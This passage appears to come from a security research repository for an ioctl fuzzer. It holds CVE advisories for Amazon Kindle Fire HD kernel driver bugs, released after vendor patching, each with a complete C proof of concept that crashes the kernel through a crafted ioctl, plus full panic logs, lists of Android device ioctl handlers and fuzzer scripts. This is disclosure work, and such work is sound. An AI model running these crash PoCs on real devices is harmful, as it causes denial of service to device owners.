226 | printf("Try open %s with command 0x%x.\n", driver, command); 227 | printf("System will crash and reboot.\n"); 228 | if(ioctl(fd, command, &payload) < 0) { 229 | printf("Allocation of structs failed, %d\n", errno); 230 | system("echo 2 > /data/local/tmp/log"); 231 | return -1; 232 | } 233 | close(fd); 234 | return 0; 235 | } 236 | 237 | 238 | ``` 239 | ### References 240 | 241 | MITRE Orgnazation: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11021 242 | 243 | Kindle Kernel Sources:https://www.amazon.com/gp/help/customer/display.html?nodeId=200203720 244 | 245 | Kindle kernel (version 4.5.5.3 for kindle fire hdx 3rd): 246 | 247 | ### Crash Log 248 | 249 | ``` 250 | To be added here. 251 | ``` 252 | -------------------------------------------------------------------------------- /CVE-2018-11025.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-11025 2 | These page show one of the practical CVEs that Found. I reported these bugs to Security@amazon.com on On 5/11/2018 and now I have been told they have repaired the bugs and the details can be published. However, Amazon does not have an advisory page at the moment. I think it is a must to list the detailed infomation here. 3 | ## Time Line 4 | * 5/11/2018 Bugs were reported to Security@amazon.com. 5 | * 06/27/2018 Amazon got confirmation that CVE-2018-11025 could cause kernel crash. 6 | * 09/18/2018 Amazon had started updating our FireOS 4 devices with the security patches. 7 | 8 | 9 | ## CVE-2018-11025 10 | ### Abstract 11 | 12 | * Name: Amazon Kindle Fire HD (3rd Generation) Kernel DoS 13 | * Date: 2018-10-10 14 | * Reporter: Shuaibing Lu, Liang Ming 15 | * Vendor: http://www.amazon.com/ 16 | * Software Link: https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2 17 | * Version: Fire OS 4.5.5.3 18 | ### Description 19 | Kernel module /omap/drivers/mfd/twl6030-gpadc.c in the kernel component in Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3 allows attackers to inject a crafted argument via the argument of an ioctl on device /dev/twl6030-gpadc with the command **24832** and cause a kernel crash. 20 | 21 | To explore this vulnerability, some one must open the device file /dev/twl6030-gpadc, call an ioctl system call on this device file with the command **24832** and a crafted payload as the third argument. 22 | > ### PoC 23 | ``` 24 | /* 25 | * This is poc of Kindle Fire HD 3rd 26 | * A bug in the ioctl interface of device file /dev/twl6030-gpadc causes 27 | * the system crash via IOCTL 24832. 28 | * 29 | * This Poc should run with permission to do ioctl on /dev/twl6030-gpadc. 30 | * 31 | */ 32 | #include 33 | #include 34 | #include 35 | #include 36 | 37 | const static char *driver = "/dev/twl6030-gpadc"; 38 | static command = 24832; 39 | 40 | struct twl6030_gpadc_user_parms { 41 | int channel; 42 | int status; 43 | unsigned short result; 44 | }; 45 | 46 | 47 | int main(int argc, char **argv, char **env) { 48 | struct twl6030_gpadc_user_parms payload; 49 | payload.channel = 0x9b2a9212; 50 | payload.status = 0x0; 51 | payload.result = 0x0; 52 | 53 | int fd = 0; 54 | fd = open(driver, O_RDWR); 55 | if (fd < 0) { 56 | printf("Failed to open %s, with errno %d\n", driver, errno); 57 | system("echo 1 > /data/local/tmp/log"); 58 | return -1; 59 | } 60 | 61 | printf("Try ioctl device file '%s', with command 0x%x and payload NULL\n", driver, command); 62 | printf("System will crash and reboot.\n"); 63 | if(ioctl(fd, command, &payload) < 0) { 64 | printf("Allocation of structs failed, %d\n", errno); 65 | system("echo 2 > /data/local/tmp/log"); 66 | return -1; 67 | } 68 | close(fd); 69 | return 0; 70 | } 71 | ``` 72 | ### References 73 | 74 | MITRE Orgnazation: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11025 75 | 76 | Kindle Kernel Sources:https://www.amazon.com/gp/help/customer/display.html?nodeId=200203720 77 | 78 | Kindle kernel (version 4.5.5.3 for kindle fire hdx 3rd): 79 | 80 | ### Crash Log 81 | 82 | ``` 83 | [18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc 84 | [18460.330139] pgd = ca210000 85 | [18460.333251] [4b3f25fc] *pgd=00000000 86 | [18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM 87 | [18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O) 88 | [18460.351440] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1) 89 | [18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180 90 | [18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484 91 | [18460.370452] pc : [] lr : [] psr: 60030013 92 | [18460.370452] sp : de94dd90 ip : 00000000 fp : de94df04 93 | [18460.383422] r10: 00000000 r9 : dcccf608 r8 : bea875ec 94 | [18460.389282] r7 : de94c000 r6 : 00000000 r5 : 00006100 r4 : bea875ec 95 | [18460.396697] r3 : fffffeb4 r2 : 4b3f2730 r1 : de94dee8 r0 : 00000001 96 | [18460.404113] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user 97 | [18460.412048] Control: 10c5387d Table: 8a21004a DAC: 00000015 98 | [18460.418609] 99 | [18460.418609] PC: 0xc031b000: 100 | [18460.423583] b000 e24b101c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 e18120b3 e5973008 101 | [18460.434234] b020 e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f0 102 | [18460.444885] b040 e24b0e17 e3a0100c ebfcf5c4 eafffff8 e1a00004 e24b1e17 e3a0200c ebfced7f 103 | [18460.455444] b060 e3500000 0afffff3 eafffff1 e51b2170 e24b101c e30f3eb4 e34f3fff e0812102 104 | [18460.465972] b080 e5122134 e18120b3 eaffffe3 03e0303c 150b016c 050b316c eaffffdf c0acabbc 105 | [18460.476623] b0a0 e1a0c00d e92dd800 e24cb004 e59030e0 e3530000 159000ec 03e00012 e89da800 106 | [18460.487182] b0c0 e1a0c00d e92dd800 e24cb004 e59000f0 e89da800 e1a0c00d e92dd800 e24cb004 107 | [18460.497863] b0e0 e5d020e9 e5d030e8 e1820003 e2000003 e89da800 e1a0c00d e92dd800 e24cb004 108 | [18460.508544] 109 | [18460.508544] LR: 0xc031a8d0: 110 | [18460.513519] a8d0 e89da878 e1a00004 ebffff20 e2000003 e3500002 13e0000a 03a00000 e89da878 111 | [18460.524078] a8f0 c09ba0c0 e1a0c00d e92ddff0 e24cb004 e24dd014 e2509000 0a000114 e59f5454 112 | [18460.534759] a910 e595008c e3500000 0a00010b e2800004 eb0e1ff0 e1d910b6 e3510001 9a00000a 113 | [18460.545318] a930 e595308c e3e06015 e59f142c e5930000 ebff4e6b e595a08c e28a0004 eb0e1f69 114 | [18460.555999] a950 e1a00006 e24bd028 e89daff0 e595a08c e3a03f52 e023a193 e5933038 e3530000 115 | [18460.566680] a970 13e0600f 1afffff3 e59a32c4 e0818101 e595c088 e3130010 e08c7008 1a000025 116 | [18460.577331] a990 e3510000 0a0000c4 e1d930b8 e3530001 0a0000d7 e1d940b6 e3540000 0a0000bc 117 | [18460.587890] a9b0 e3a0000e e3a01002 e3a02090 e5956088 ebfff8bc e3540001 0a0000d1 e1d920b6 118 | [18460.598571] 119 | [18460.598571] SP: 0xde94dd10: 120 | [18460.603546] dd10 00000000 0000000d de94dda0 10624dd3 de94dd4c c031b080 60030013 ffffffff 121 | [18460.614196] dd30 de94dd7c bea875ec de94df04 de94dd48 c06a5318 c0008370 00000001 de94dee8 122 | [18460.624877] dd50 4b3f2730 fffffeb4 bea875ec 00006100 00000000 de94c000 bea875ec dcccf608 123 | [18460.635528] dd70 00000000 de94df04 00000000 de94dd90 c031a950 c031b080 60030013 ffffffff 124 | [18460.646087] dd90 de94ddac 9b2a9212 00000000 00000000 00040000 0001f8fc 00000000 00000000 125 | [18460.656738] ddb0 c00795a0 00000001 de94ddd4 de94ddc8 c00795b4 c00792bc de94de0c de94ddd8 126 | [18460.667419] ddd0 c0070df8 c00795ac de94c000 00000001 00000004 dd32f8f4 60000013 00000001 127 | [18460.678100] ddf0 00000001 00000004 dd32f800 00000000 00000000 de94de10 c00723a0 c06a4818 128 | [18460.688629] 129 | [18460.688659] FP: 0xde94de84: 130 | [18460.693725] de84 de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 131 | [18460.704284] dea4 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 132 | [18460.714935] dec4 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 133 | [18460.725616] dee4 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 134 | [18460.736328] df04 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 135 | [18460.746856] df24 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 136 | [18460.757537] df44 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 137 | [18460.768096] df64 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 00000400 138 | [18460.778625] 139 | [18460.778625] R1: 0xde94de68: 140 | [18460.783721] de68 c2572140 de94debc 00000001 00000028 000fffff 00000001 de94dedc de94de90 141 | [18460.794403] de88 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 000fffff 142 | [18460.804962] dea8 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 00000001 143 | [18460.815643] dec8 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 00000000 144 | [18460.826202] dee8 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 c031af2c 145 | [18460.836730] df08 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 de94df0c 146 | [18460.847381] df28 de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 00000000 147 | [18460.858032] df48 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 00000000 148 | [18460.868713] 149 | [18460.868713] R3: 0xfffffe34: 150 | [18460.873687] fe34 ******** ******** ******** ******** ******** ******** ******** ******** 151 | [18460.884246] fe54 ******** ******** ******** ******** ******** ******** ******** ******** 152 | [18460.894805] fe74 ******** ******** ******** ******** ******** ******** ******** ******** 153 | [18460.905456] fe94 ******** ******** ******** ******** ******** ******** ******** ******** 154 | [18460.916137] feb4 ******** ******** ******** ******** ******** ******** ******** ******** 155 | [18460.926788] fed4 ******** ******** ******** ******** ******** ******** ******** ******** 156 | [18460.937347] fef4 ******** ******** ******** ******** ******** ******** ******** ******** 157 | [18460.948028] ff14 ******** ******** ******** ******** ******** ******** ******** ******** 158 | [18460.958709] 159 | [18460.958709] R7: 0xde94bf80: 160 | [18460.963684] bf80 de926680 c00635cc 00000013 de84190c de926680 c00635cc 00000013 00000000 161 | [18460.974365] bfa0 00000000 00000000 de94bff4 de94bfb8 c0068af4 c00635d8 00000000 00000000 162 | [18460.985015] bfc0 de926680 00000000 00000000 00000000 de94bfd0 de94bfd0 00000000 de84190c 163 | [18460.995574] bfe0 c0068a64 c004cd64 00000000 de94bff8 c004cd64 c0068a70 1d04e2fb 1dfbe204 164 | [18461.006225] c000 00000000 00000002 00000000 c2572140 c0a0e840 00000000 00000015 cf9fca80 165 | [18461.016906] c020 00000000 de94c000 c09ddc50 c2572140 c25717c0 c1617b40 de94da7c de94d9c8 166 | [18461.027587] c040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000 167 | [18461.038146] c060 00c5f4c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000 168 | [18461.048828] 169 | [18461.048828] R9: 0xdcccf588: 170 | [18461.053802] f588 dcccf588 dcccf588 00000000 00000000 00000000 c06bc674 000200da c09dda58 171 | [18461.064483] f5a8 00000000 00000000 dcccf5b0 dcccf5b0 00000000 dcccf5bc dcccf5bc 00000000 172 | [18461.075134] f5c8 5ae3ed25 00000000 00000000 00000000 dcccf5e0 00000000 00000000 00000000 173 | [18461.085815] f5e8 00200000 00000000 00000000 dcccf5f4 dcccf5f4 dccb2440 dccb2440 00000000 174 | [18461.096343] f608 00052180 00000000 00000000 00000000 00000000 00000000 c06b9600 dd1a4800 175 | [18461.107025] f628 dcccf6e0 dccb0300 00000c45 00000001 00a0003b 5ae3ed25 2bc5ac58 5ae3ed25 176 | [18461.117675] f648 2bc5ac58 5ae3ed25 2bc5ac58 00000000 00000000 00000000 00000000 00000000 177 | [18461.128234] f668 00000000 00000000 00000000 00000000 00000001 00000000 00000000 dcccf684 178 | [18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8) 179 | [18461.146697] Stack: (0xde94dd90 to 0xde94e000) 180 | [18461.151611] dd80: de94ddac 9b2a9212 00000000 00000000 181 | [18461.160827] dda0: 00040000 0001f8fc 00000000 00000000 c00795a0 00000001 de94ddd4 de94ddc8 182 | [18461.170043] ddc0: c00795b4 c00792bc de94de0c de94ddd8 c0070df8 c00795ac de94c000 00000001 183 | [18461.179138] dde0: 00000004 dd32f8f4 60000013 00000001 00000001 00000004 dd32f800 00000000 184 | [18461.188354] de00: 00000000 de94de10 c00723a0 c06a4818 00000004 00000001 dd32e0d8 dd32f800 185 | [18461.197570] de20: dd32e000 0000000a de94c000 c26fda80 de94de54 de94de40 c02ba53c c0072360 186 | [18461.206787] de40: dd32f800 dd32e000 de94de74 de94de58 c02c3c88 c02ba518 dd32e000 00000002 187 | [18461.215881] de60: 00000002 dd32fbbc c2572140 de94debc 00000001 00000028 000fffff 00000001 188 | [18461.225097] de80: de94dedc de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 189 | [18461.234313] dea0: c00723a0 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 190 | [18461.243408] dec0: 00000000 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 191 | [18461.252624] dee0: 00000000 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 192 | [18461.261840] df00: c0136044 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 193 | [18461.271057] df20: d8f925d8 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 194 | [18461.280151] df40: de94c000 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 195 | [18461.289367] df60: de94c000 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 196 | [18461.298583] df80: 00000400 bea87618 00010e5c 00000000 00000036 c0013e08 00000000 de94dfa8 197 | [18461.307800] dfa0: c0013c60 c0136578 bea87618 00010e5c 00000004 00006100 bea875ec bea875ec 198 | [18461.316894] dfc0: bea87618 00010e5c 00000000 00000036 00000000 00000000 00000000 bea87604 199 | [18461.326110] dfe0: 00000000 bea875d4 00010698 0002918c 60000010 00000004 00000000 00000000 200 | [18461.335296] Backtrace: 201 | [18461.338317] [] (twl6030_gpadc_ioctl+0x0/0x180) from [] (do_vfs_ioctl+0x8c/0x5b4) 202 | [18461.348571] r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000 203 | [18461.355560] [] (do_vfs_ioctl+0x0/0x5b4) from [] (sys_ioctl+0x74/0x84) 204 | [18461.364807] [] (sys_ioctl+0x0/0x84) from [] (ret_fast_syscall+0x0/0x30) 205 | [18461.374206] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618 206 | [18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134) 207 | [18461.401061] Board Information: 208 | [18461.401061] Revision : 0001 209 | [18461.401092] Serial : 0000000000000000 210 | [18461.401092] SoC Information: 211 | [18461.401092] CPU : OMAP4470 212 | [18461.401122] Rev : ES1.0 213 | [18461.401122] Type : HS 214 | [18461.401122] Production ID: 0002B975-000000CC 215 | [18461.401122] Die ID : 1CC60000-50002FFF-0B00935D-11007004 216 | [18461.401153] 217 | [18461.406127] audit_printk_skb: 111 callbacks suppressed 218 | [18461.406127] type=1400 audit(1525657115.783:1097): avc: denied { getattr } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file 219 | [18461.406280] type=1400 audit(1525657115.783:1098): avc: denied { execute } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file 220 | [18461.406524] type=1400 audit(1525657115.783:1099): avc: denied { read open } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file 221 | [18461.406768] type=1400 audit(1525657115.783:1100): avc: denied { execute_no_trans } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file 222 | [18461.534057] ---[ end trace f98f4a7b98572f61 ]--- 223 | [18461.540374] Kernel panic - not syncing: Fatal exception 224 | [18461.546173] CPU1: stopping 225 | [18461.549285] Backtrace: 226 | [18461.552459] [] (dump_backtrace+0x0/0x10c) from [] (dump_stack+0x18/0x1c) 227 | [18461.561828] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950 228 | [18461.568969] [] (dump_stack+0x0/0x1c) from [] (handle_IPI+0x190/0x1c4) 229 | [18461.578185] [] (handle_IPI+0x0/0x1c4) from [] (gic_handle_irq+0x58/0x60) 230 | [18461.587554] [] (gic_handle_irq+0x0/0x60) from [] (__irq_usr+0x40/0x60) 231 | [18461.596862] Exception stack(0xc8967fb0 to 0xc8967ff8) 232 | [18461.602691] 7fa0: 404143ed 4041294b 00000054 000012f0 233 | [18461.611755] 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040d148 404111d8 beb9c2e0 404275c0 234 | [18461.620971] 7fe0: 40416bef beb9c1f0 4009d01f 400a0ec0 000f0010 ffffffff 235 | [18461.628478] r6:ffffffff r5:000f0010 r4:400a0ec0 r3:404143ed 236 | [18461.635559] CPU0 PC (0) : 0xc003ee38 237 | [18461.639617] CPU0 PC (1) : 0xc003ee54 238 | [18461.643798] CPU0 PC (2) : 0xc003ee54 239 | [18461.647857] CPU0 PC (3) : 0xc003ee54 240 | [18461.651916] CPU0 PC (4) : 0xc003ee54 241 | [18461.656097] CPU0 PC (5) : 0xc003ee54 242 | [18461.660156] CPU0 PC (6) : 0xc003ee54 243 | [18461.664215] CPU0 PC (7) : 0xc003ee54 244 | [18461.668395] CPU0 PC (8) : 0xc003ee54 245 | [18461.672454] CPU0 PC (9) : 0xc003ee54 246 | [18461.676513] CPU1 PC (0) : 0xc0019b2c 247 | [18461.680694] CPU1 PC (1) : 0xc0019b2c 248 | [18461.684753] CPU1 PC (2) : 0xc0019b2c 249 | [18461.688812] CPU1 PC (3) : 0xc0019b2c 250 | [18461.692871] CPU1 PC (4) : 0xc0019b2c 251 | [18461.697051] CPU1 PC (5) : 0xc0019b2c 252 | [18461.701110] CPU1 PC (6) : 0xc0019b2c 253 | [18461.705169] CPU1 PC (7) : 0xc0019b2c 254 | [18461.709381] CPU1 PC (8) : 0xc0019b2c 255 | [18461.713409] CPU1 PC (9) : 0xc0019b2c 256 | [18461.717498] 257 | [18461.719268] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017 258 | [18461.719299] 259 | ``` 260 | -------------------------------------------------------------------------------- /CVE-Advisory.md: -------------------------------------------------------------------------------- 1 | # CVE Advisory 2 | These page show the practical CVEs that Found. I reported these bugs to Security@amazon.com on On 5/11/2018 and now I have been told they have repaired the bugs and the details can be published. However, Amazon does not have an advisory page at the moment. I think it is a must to list the detailed infomation here. 3 | ## Time Line 4 | * 5/11/2018 Bugs were reported to Security@amazon.com. 5 | * 06/27/2018 Amazon confirmation. 6 | * 09/18/2018 Amazon had started updating our FireOS 4 devices with the security patches. 7 | 8 | ## CVEs 9 | 10 | * The advisory for the [CVE-2018-11019](CVE-2018-11019.md). 11 | * The advisory for the [CVE-2018-11020](CVE-2018-11020.md). 12 | * The advisory for the [CVE-2018-11021](CVE-2018-11021.md). 13 | * The advisory for the [CVE-2018-11022](CVE-2018-11022.md). 14 | * The advisory for the [CVE-2018-11025](CVE-2018-11025.md). 15 | 16 | 17 | -------------------------------------------------------------------------------- /DriverDevices/honor8_device_ioctl.txt: -------------------------------------------------------------------------------- 1 | /dev/block/mmcblk0p49 block_ioctl 2 | /dev/graphics/fb2 fb_ioctl 3 | /dev/ptmx tty_ioctl 4 | /dev/urandom random_ioctl 5 | /dev/mali0 kbase_ioctl 6 | /dev/loop-control loop_control_ioctl 7 | /dev/nve0 nve_ioctl 8 | /dev/tun tun_chr_ioctl 9 | /dev/ppp ppp_ioctl 10 | /dev/bus/usb/001/001 usbdev_ioctl 11 | /dev/usb-ffs/hdb/ep0 ffs_ep0_ioctl 12 | /dev/usb-ffs/hdb/ep2 ffs_epfile_ioctl 13 | /dev/usb_accessory acc_ioctl 14 | /dev/input/event1 evdev_ioctl 15 | /dev/uinput uinput_ioctl 16 | /dev/rtc0 rtc_dev_ioctl 17 | /dev/media4 media_ioctl 18 | /dev/v4l-subdev8 v4l2_ioctl 19 | /dev/watchdog0 watchdog_ioctl 20 | /dev/device-mapper dm_ctl_ioctl 21 | /dev/ion ion_ioctl 22 | /dev/ashmem ashmem_ioctl 23 | /dev/alarm alarm_ioctl 24 | /dev/sw_sync sw_sync_ioctl 25 | /dev/hwlog_exception logger_ioctl 26 | /dev/binder binder_ioctl 27 | /dev/imgsysbrg_vdec0 sysbrg_ioctl 28 | /dev/hifi_misc hifi_misc_ioctl 29 | /dev/voice_proxy_vowifi vowifi_ioctl 30 | /dev/isp_log isp_log_ioctl 31 | /dev/flp flp_ioctl 32 | /dev/efuse efusec_ioctl 33 | /dev/hisi_teelog tlogger_ioctl 34 | /dev/log/hilog hilog_ioctl 35 | /dev/tfa9895 tfa9895_ioctl 36 | /dev/deviceboxID deviceboxID_ioctl 37 | /dev/sensorhub shb_ioctl 38 | /dev/motionhub mhb_ioctl 39 | /dev/cahub chb_ioctl 40 | /dev/fingerprinthub fhb_ioctl 41 | /dev/hwlog_switch log_switch_ioctl 42 | /dev/bdat bdat_ioctl 43 | /dev/fingerprint fingerprint_ioctl 44 | /dev/dsm dsm_ioctl 45 | /dev/hwbt hw_bt_ioctl 46 | /dev/hwgnss hw_gnss_ioctl 47 | /dev/hwfm hw_fm_ioctl 48 | /dev/hwbfgdbg hw_debug_ioctl 49 | /dev/chrAppBt chrAppBt_ioctl 50 | /dev/chrAppGnss chrAppGnss_ioctl 51 | /dev/chrAppWifi chrAppWifi_ioctl 52 | /dev/chrKmsgWifi chrKmsgWifi_ioctl 53 | /dev/chrKmsgPlat chrKmsgPlat_ioctl 54 | /dev/hw_bfm bfmr_ioctl 55 | /dev/snd/controlC0 snd_ctl_ioctl 56 | /dev/snd/timer snd_timer_user_ioctl 57 | /dev/snd/pcmC0D4p snd_pcm_playback_ioctl 58 | /dev/snd/pcmC0D0c snd_pcm_capture_ioctl 59 | -------------------------------------------------------------------------------- /DriverDevices/kindle7_device_ioctl.txt: -------------------------------------------------------------------------------- 1 | /dev/block/mmcblk0p11 block_ioctl 2 | /dev/tf_driver tf_device_ioctl 3 | /dev/tf_ctrl tf_ctrl_device_ioctl 4 | /dev/graphics/fb2 fb_ioctl 5 | /dev/dsscomp comp_ioctl 6 | /dev/ttyGS3 tty_ioctl 7 | /dev/urandom random_ioctl 8 | /dev/ion ion_ioctl_error_occur 9 | /dev/loop-control loop_control_ioctl 10 | /dev/gcioctl dev_ioctl 11 | /dev/twl6030-gpadc twl6030_gpadc_ioctl 12 | /dev/ubi_ctrl ctrl_cdev_ioctl 13 | /dev/tun tun_chr_ioctl 14 | /dev/ppp ppp_ioctl 15 | /dev/input/event5 evdev_ioctl 16 | /dev/uinput uinput_ioctl 17 | /dev/bu52061 bu52061_ioctl 18 | /dev/i2c-4 i2cdev_ioctl 19 | /dev/device-mapper dm_ctl_ioctl 20 | /dev/binder binder_ioctl 21 | /dev/ashmem ashmem_ioctl 22 | /dev/log/main logger_ioctl 23 | /dev/alarm alarm_ioctl 24 | /dev/trapz trapz_ioctl 25 | /dev/rpmsg-omx1 rpmsg_omx_ioctl_too_many_struct -------------------------------------------------------------------------------- /DriverDevices/mate9_device_ioctl.txt: -------------------------------------------------------------------------------- 1 | /dev/ashmem ashmem_ioctl 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2018, The Regents of the National Key Laboratory of Science and 2 | Technology on Information System Security All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | * Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation 12 | and/or other materials provided with the distribution. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 15 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 16 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 17 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 18 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 19 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 20 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 21 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 22 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 23 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /MangoFuzz/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2015, The Regents of the University of California 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | * Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation 12 | and/or other materials provided with the distribution. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 15 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 16 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 17 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 18 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 19 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 20 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 21 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 22 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 23 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 24 | -------------------------------------------------------------------------------- /MangoFuzz/dev_runner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import random 3 | import argparse 4 | import os 5 | import time 6 | import subprocess 7 | 8 | def main(): 9 | parser = argparse.ArgumentParser(description="MangoFuzz options") 10 | parser.add_argument('-f', type=str, help="Path to the out file", required=True) 11 | parser.add_argument('-num', type=str, help="Number of tests to run per driver", required=True) 12 | parser.add_argument('-seed', type=str, help="Choose seed if desired", default=None) 13 | parser.add_argument('-port', type=str, help="Choose port if desired", default='2022') 14 | args = parser.parse_args() 15 | 16 | out_file = args.f 17 | num_tests = args.num 18 | seed = args.seed 19 | port = args.port 20 | 21 | if seed is not None: 22 | random.seed(seed) 23 | else: 24 | random.seed(time.time) 25 | 26 | devices = os.listdir(out_file) 27 | iters = 0 28 | count_dict = {} 29 | for dev in devices: 30 | count_dict[dev] = 0 31 | 32 | while (True): 33 | device = random.choice(devices) 34 | device_path = out_file + '/' + device 35 | print '[*] ', device 36 | print '[#] iters: %d' % iters 37 | print '[#] dev iters: %d' % count_dict[device] 38 | runner_cmd = './runner.py -f ' + device_path + ' -num ' + num_tests + ' -port ' + port 39 | print runner_cmd 40 | subprocess.call(['./runner.py', '-f', device_path, '-num', num_tests, '-port', port]) 41 | count_dict[device] += int(num_tests) 42 | iters += int(num_tests) 43 | 44 | 45 | if __name__ == '__main__': 46 | main() 47 | -------------------------------------------------------------------------------- /MangoFuzz/executor/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/datadancer/HIAFuzz/c986d9c9fca140df0446da58f100bd1c6c985b82/MangoFuzz/executor/a.out -------------------------------------------------------------------------------- /MangoFuzz/executor/executor.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include //strlen 3 | #include 4 | #include //inet_addr 5 | #include //write 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | // Socket boilerplate code taken from here: http://www.binarytides.com/server-client-example-c-sockets-linux/ 13 | 14 | /* 15 | seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, 